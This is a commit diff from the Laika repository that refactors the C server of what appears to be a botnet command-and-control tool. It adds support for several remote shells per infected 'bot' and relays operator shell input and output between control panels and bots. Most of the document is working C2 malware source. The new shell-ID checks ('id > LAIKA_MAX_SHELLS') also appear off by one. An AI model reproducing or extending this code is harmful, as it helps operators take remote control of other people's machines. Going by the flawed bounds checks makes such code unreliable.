CPunch/Laika
1
0
Fork 0
mirror of https://github.com/CPunch/Laika.git synced 2025-10-04 15:20:07 +00:00
Code Issues Projects Releases Wiki Activity

Major shell packet refactoring

Browse Source 
- can now open multiple shells per peer (change LAIKA_MAX_SHELLS)
- more sanity checking for public keys (new peers with duplicate keys are killed
- misc. refactoring, added cnc/cpeer.[ch]
This commit is contained in:
CPunch
2022-05-07 20:09:42 -05:00
parent 67f404dac6
commit 7d96f3252c
15 changed files with 455 additions and 264 deletions
Download Patch File Download Diff File Expand all files Collapse all files

102
cnc/src/cnc.c
View File

@@ -5,37 +5,9 @@
#include "ltask.h"
#include "cpanel.h"
#include "cpeer.h"
#include "cnc.h"
/* ===============================================[[ Peer Info ]]================================================ */
struct sLaika_peerInfo *allocBasePeerInfo(struct sLaika_cnc *cnc, size_t sz) {
struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)laikaM_malloc(sz);
pInfo->cnc = cnc;
pInfo->lastPing = laikaT_getTime();
return pInfo;
}
struct sLaika_botInfo *laikaC_newBotInfo(struct sLaika_cnc *cnc) {
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)allocBasePeerInfo(cnc, sizeof(struct sLaika_botInfo));
bInfo->shellAuth = NULL;
return bInfo;
}
struct sLaika_authInfo *laikaC_newAuthInfo(struct sLaika_cnc *cnc) {
struct sLaika_authInfo *aInfo = (struct sLaika_authInfo*)allocBasePeerInfo(cnc, sizeof(struct sLaika_authInfo));
aInfo->shellBot = NULL;
return aInfo;
}
void laikaC_freePeerInfo(struct sLaika_peer *peer, struct sLaika_peerInfo *pInfo) {
peer->uData = NULL;
laikaM_free(pInfo);
}
/* ==============================================[[ PeerHashMap ]]=============================================== */
typedef struct sCNC_PeerHashElem {
@@ -57,6 +29,13 @@ uint64_t cnc_PeerElemHash(const void *item, uint64_t seed0, uint64_t seed1) {
/* ============================================[[ Packet Handlers ]]============================================= */
bool checkPeerKey(struct sLaika_peer *peer, void *uData) {
if (sodium_memcmp(peer->peerPub, uData, crypto_kx_PUBLICKEYBYTES) == 0)
LAIKA_ERROR("public key is already in use!\n");
return true;
}
void laikaC_handleHandshakeRequest(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
char magicBuf[LAIKA_MAGICLEN];
struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData;
@@ -82,6 +61,9 @@ void laikaC_handleHandshakeRequest(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, v
laikaS_read(&peer->sock, peer->hostname, LAIKA_HOSTNAME_LEN);
laikaS_read(&peer->sock, peer->inet, LAIKA_INET_LEN);
/* check and make sure there's not already a peer with the same key (might throw an LAIKA_ERROR, which will kill the peer) */
laikaC_iterPeers(cnc, checkPeerKey, (void*)peer->peerPub);
/* restore null-terminator */
peer->hostname[LAIKA_HOSTNAME_LEN-1] = '\0';
peer->inet[LAIKA_INET_LEN-1] = '\0';
@@ -111,40 +93,6 @@ void laikaC_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
laikaS_emptyOutPacket(peer, LAIKAPKT_PINGPONG); /* gg 2 ez */
}
void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)uData;
struct sLaika_cnc *cnc = bInfo->info.cnc;
uint8_t _res = laikaS_readByte(&peer->sock);
/* ignore packet if shell isn't open */
if (bInfo->shellAuth == NULL)
return;
/* forward to SHELL_CLOSE to auth */
laikaS_emptyOutPacket(bInfo->shellAuth, LAIKAPKT_SHELL_CLOSE);
/* close shell */
((struct sLaika_authInfo*)(bInfo->shellAuth->uData))->shellBot = NULL;
bInfo->shellAuth = NULL;
}
void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
char buf[LAIKA_SHELL_DATA_MAX_LENGTH];
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)uData;
uint8_t id;
/* ignore packet if malformed */
if (bInfo->shellAuth == NULL || sz < 1 || sz > LAIKA_SHELL_DATA_MAX_LENGTH)
return;
laikaS_read(&peer->sock, (void*)buf, sz);
/* forward SHELL_DATA packet to auth */
laikaS_startVarPacket(bInfo->shellAuth, LAIKAPKT_SHELL_DATA);
laikaS_write(&bInfo->shellAuth->sock, buf, sz);
laikaS_endVarPacket(bInfo->shellAuth);
}
/* =============================================[[ Packet Tables ]]============================================== */
#define DEFAULT_PKT_TBL \
@@ -165,7 +113,7 @@ struct sLaika_peerPacketInfo laikaC_botPktTbl[LAIKAPKT_MAXNONE] = {
DEFAULT_PKT_TBL,
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_CLOSE,
laikaC_handleShellClose,
0,
sizeof(uint32_t),
false),
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_DATA,
laikaC_handleShellData,
@@ -251,6 +199,7 @@ void laikaC_freeCNC(struct sLaika_cnc *cnc) {
void laikaC_onAddPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) {
int i;
((struct sLaika_peerInfo*)peer->uData)->completeHandshake = true;
/* add peer to panels list (if it's a panel) */
if (peer->type == PEER_AUTH)
@@ -268,21 +217,18 @@ void laikaC_onAddPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) {
void laikaC_onRmvPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) {
int i;
/* ignore uninitalized peers */
if (!((struct sLaika_peerInfo*)peer->uData)->completeHandshake)
return;
switch (peer->type) {
case PEER_BOT: {
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)peer->uData;
/* close any open shells */
if (bInfo->shellAuth)
laikaC_closeBotShell(bInfo);
laikaC_closeBotShells(peer);
break;
}
case PEER_AUTH: {
struct sLaika_authInfo *aInfo = (struct sLaika_authInfo*)peer->uData;
/* close any open shells */
if (aInfo->shellBot)
laikaC_closeAuthShell(aInfo);
laikaC_closeAuthShell(peer);
/* remove peer from panels list */
laikaC_rmvAuth(cnc, peer);
@@ -301,10 +247,14 @@ void laikaC_onRmvPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) {
}
void laikaC_setPeerType(struct sLaika_cnc *cnc, struct sLaika_peer *peer, PEERTYPE type) {
/* make sure to update connected peers */
laikaC_onRmvPeer(cnc, peer);
/* free old peerInfo */
laikaC_freePeerInfo(peer, peer->uData);
/* update accepted packets */
peer->type = type;
switch (type) {
case PEER_AUTH:
peer->packetTbl = laikaC_authPktTbl;
@@ -319,10 +269,6 @@ void laikaC_setPeerType(struct sLaika_cnc *cnc, struct sLaika_peer *peer, PEERTY
break;
}
/* make sure to update connected peers */
laikaC_onRmvPeer(cnc, peer);
peer->type = type;
/* a new (but not-so-new) peer has arrived */
laikaC_onAddPeer(cnc, peer);
}
@@ -446,6 +392,8 @@ bool sweepPeers(struct sLaika_peer *peer, void *uData) {
LAIKA_DEBUG("timeout reached for %p! [%d]\n", peer, currTime - pInfo->lastPing);
laikaC_killPeer(cnc, peer);
}
return true;
}
void laikaC_sweepPeersTask(struct sLaika_taskService *service, struct sLaika_task *task, clock_t currTick, void *uData) {

85
cnc/src/cpanel.c
View File

@@ -1,6 +1,8 @@
#include "lerror.h"
#include "lmem.h"
#include "cnc.h"
#include "cpeer.h"
#include "cpanel.h"
bool sendPanelPeerIter(struct sLaika_peer *peer, void *uData) {
@@ -39,32 +41,32 @@ void laikaC_sendRmvPeer(struct sLaika_peer *authPeer, struct sLaika_peer *peer)
laikaS_endOutPacket(authPeer);
}
void laikaC_closeAuthShell(struct sLaika_authInfo *aInfo) {
/* forward to SHELL_CLOSE to auth */
laikaS_emptyOutPacket(aInfo->shellBot, LAIKAPKT_SHELL_CLOSE);
void laikaC_closeAuthShell(struct sLaika_peer *auth) {
struct sLaika_authInfo *aInfo = (struct sLaika_authInfo*)auth->uData;
/* close shell */
((struct sLaika_botInfo*)(aInfo->shellBot->uData))->shellAuth = NULL;
if (!aInfo->shellBot)
return;
/* forward SHELL_CLOSE to bot */
laikaS_startOutPacket(aInfo->shellBot, LAIKAPKT_SHELL_CLOSE);
laikaS_writeInt(&aInfo->shellBot->sock, &aInfo->shellID, sizeof(uint32_t));
laikaS_endOutPacket(aInfo->shellBot);
/* rmv shell */
laikaC_rmvShell((struct sLaika_botInfo*)aInfo->shellBot->uData, auth);
aInfo->shellBot = NULL;
}
void laikaC_closeBotShell(struct sLaika_botInfo *bInfo) {
/* forward to SHELL_CLOSE to auth */
laikaS_emptyOutPacket(bInfo->shellAuth, LAIKAPKT_SHELL_CLOSE);
/* close shell */
((struct sLaika_authInfo*)(bInfo->shellAuth->uData))->shellBot = NULL;
bInfo->shellAuth = NULL;
}
/* ============================================[[ Packet Handlers ]]============================================= */
void laikaC_handleAuthenticatedHandshake(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData;
struct sLaika_cnc *cnc = pInfo->cnc;
authPeer->type = laikaS_readByte(&authPeer->sock);
PEERTYPE type;
int i;
switch (authPeer->type) {
type = laikaS_readByte(&authPeer->sock);
switch (type) {
case PEER_AUTH:
/* check that peer's pubkey is authenticated */
if (!laikaK_checkAuth(authPeer->peerPub, cnc->authKeys, cnc->authKeysCount))
@@ -107,10 +109,11 @@ void laikaC_handleAuthenticatedShellOpen(struct sLaika_peer *authPeer, LAIKAPKT_
/* link shells */
aInfo->shellBot = peer;
((struct sLaika_botInfo*)(peer->uData))->shellAuth = authPeer;
aInfo->shellID = laikaC_addShell((struct sLaika_botInfo*)peer->uData, authPeer);
/* forward the request to open a shell */
laikaS_startOutPacket(peer, LAIKAPKT_SHELL_OPEN);
laikaS_writeInt(&peer->sock, &aInfo->shellID, sizeof(uint32_t));
laikaS_writeInt(&peer->sock, &cols, sizeof(uint16_t));
laikaS_writeInt(&peer->sock, &rows, sizeof(uint16_t));
laikaS_endOutPacket(peer);
@@ -124,10 +127,16 @@ void laikaC_handleAuthenticatedShellClose(struct sLaika_peer *authPeer, LAIKAPKT
if (aInfo->shellBot == NULL)
return;
laikaC_closeAuthShell(aInfo);
laikaC_closeAuthShell(authPeer);
}
/* improves readability */
#define SENDSHELLDATA(peer, data, size, id) \
laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA); \
laikaS_writeInt(&peer->sock, id, sizeof(uint32_t)); \
laikaS_write(&peer->sock, data, size); \
laikaS_endVarPacket(peer);
void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData) {
uint8_t data[LAIKA_SHELL_DATA_MAX_LENGTH];
struct sLaika_authInfo *aInfo = (struct sLaika_authInfo*)uData;
@@ -144,14 +153,24 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_
/* read data */
laikaS_read(&authPeer->sock, data, sz);
/* forward data to peer */
if (authPeer->osType == peer->osType) {
/* forward raw data to peer */
laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
laikaS_write(&peer->sock, data, sz);
laikaS_endVarPacket(peer);
if (sz + sizeof(uint32_t) > LAIKA_SHELL_DATA_MAX_LENGTH) {
/* we need to split the buffer since the packet for c2c->bot includes an id (since a bot can host multiple shells,
while the auth/shell client only keeps track of 1)
*/
/* first part */
SENDSHELLDATA(peer, data, sz-sizeof(uint32_t), &aInfo->shellID);
/* second part */
SENDSHELLDATA(peer, data + (sz-sizeof(uint32_t)), sizeof(uint32_t), &aInfo->shellID);
} else {
SENDSHELLDATA(peer, data, sz, &aInfo->shellID);
}
} else if (authPeer->osType == OS_LIN && peer->osType == OS_WIN) { /* convert data if its linux -> windows */
uint8_t *buf = NULL;
int i, count = 0, cap = 2;
uint8_t *buf = laikaM_malloc(sz);
int i, count = 0, cap = sz;
/* convert line endings */
for (i = 0; i < sz; i++) {
@@ -170,19 +189,15 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_
/* send buffer (99% of the time this isn't necessary, but the 1% can make
buffers > LAIKA_SHELL_DATA_MAX_LENGTH. so we send it in chunks) */
i = count;
while (i > LAIKA_SHELL_DATA_MAX_LENGTH) {
laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
laikaS_write(&peer->sock, buf + (count - i), LAIKA_SHELL_DATA_MAX_LENGTH);
laikaS_endVarPacket(peer);
while (i+sizeof(uint32_t) > LAIKA_SHELL_DATA_MAX_LENGTH) {
SENDSHELLDATA(peer, buf + (count - i), LAIKA_SHELL_DATA_MAX_LENGTH-sizeof(uint32_t), &aInfo->shellID);
i -= LAIKA_SHELL_DATA_MAX_LENGTH;
}
/* send the leftovers */
laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
laikaS_write(&peer->sock, buf + (count - i), i);
laikaS_endVarPacket(peer);
SENDSHELLDATA(peer, buf + (count - i), i, &aInfo->shellID);
laikaM_free(buf);
}
}
}
#undef SENDSHELLDATA

138
cnc/src/cpeer.c Normal file
View File

@@ -0,0 +1,138 @@
#include "lmem.h"
#include "cnc.h"
#include "cpeer.h"
/* ===============================================[[ Peer Info ]]================================================ */
struct sLaika_peerInfo *allocBasePeerInfo(struct sLaika_cnc *cnc, size_t sz) {
struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)laikaM_malloc(sz);
pInfo->cnc = cnc;
pInfo->lastPing = laikaT_getTime();
pInfo->completeHandshake = false;
return pInfo;
}
struct sLaika_botInfo *laikaC_newBotInfo(struct sLaika_cnc *cnc) {
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)allocBasePeerInfo(cnc, sizeof(struct sLaika_botInfo));
int i;
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
bInfo->shellAuths[i] = NULL;
}
return bInfo;
}
struct sLaika_authInfo *laikaC_newAuthInfo(struct sLaika_cnc *cnc) {
struct sLaika_authInfo *aInfo = (struct sLaika_authInfo*)allocBasePeerInfo(cnc, sizeof(struct sLaika_authInfo));
aInfo->shellBot = NULL;
return aInfo;
}
void laikaC_freePeerInfo(struct sLaika_peer *peer, struct sLaika_peerInfo *pInfo) {
peer->uData = NULL;
laikaM_free(pInfo);
}
/*int laikaC_findAuthShell(struct sLaika_botInfo *bot, uint32_t id) {
struct sLaika_peer *auth;
struct sLaika_authInfo *aInfo;
int i;
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
if ((auth = bot->shellAuths[i]) != NULL && (aInfo = auth->uData)->shellID == id)
return i;
}
return -1;
}*/
int laikaC_addShell(struct sLaika_botInfo *bInfo, struct sLaika_peer *auth) {
int i;
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
if (bInfo->shellAuths[i] == NULL) {
bInfo->shellAuths[i] = auth;
return i;
}
}
return -1;
}
void laikaC_rmvShell(struct sLaika_botInfo *bInfo, struct sLaika_peer *auth) {
int i;
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
if (bInfo->shellAuths[i] == auth) {
bInfo->shellAuths[i] = NULL;
return;
}
}
}
void laikaC_closeBotShells(struct sLaika_peer *bot) {
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)bot->uData;
struct sLaika_peer *auth;
int i;
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
if ((auth = bInfo->shellAuths[i]) != NULL) {
/* forward to SHELL_CLOSE to auth */
laikaS_emptyOutPacket(auth, LAIKAPKT_SHELL_CLOSE);
/* close shell */
((struct sLaika_authInfo*)(auth->uData))->shellBot = NULL;
bInfo->shellAuths[i] = NULL;
}
}
}
/* ============================================[[ Packet Handlers ]]============================================= */
void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)uData;
struct sLaika_cnc *cnc = bInfo->info.cnc;
struct sLaika_peer *auth;
uint32_t id;
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
/* ignore packet if shell isn't open */
if (id > LAIKA_MAX_SHELLS || (auth = bInfo->shellAuths[id]) == NULL)
return;
/* forward SHELL_CLOSE to auth */
laikaS_emptyOutPacket(auth, LAIKAPKT_SHELL_CLOSE);
/* close shell */
((struct sLaika_authInfo*)(auth->uData))->shellBot = NULL;
bInfo->shellAuths[id] = NULL;
}
void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
char buf[LAIKA_SHELL_DATA_MAX_LENGTH];
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)uData;
struct sLaika_peer *auth;
uint32_t id;
/* ignore packet if malformed */
if (sz < 1 || sz > LAIKA_SHELL_DATA_MAX_LENGTH+sizeof(uint32_t))
return;
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
/* ignore packet if shell isn't open */
if (id > LAIKA_MAX_SHELLS || (auth = bInfo->shellAuths[id]) == NULL)
return;
laikaS_read(&peer->sock, (void*)buf, sz-sizeof(uint32_t));
/* forward SHELL_DATA packet to auth */
laikaS_startVarPacket(auth, LAIKAPKT_SHELL_DATA);
laikaS_write(&auth->sock, buf, sz-sizeof(uint32_t));
laikaS_endVarPacket(auth);
}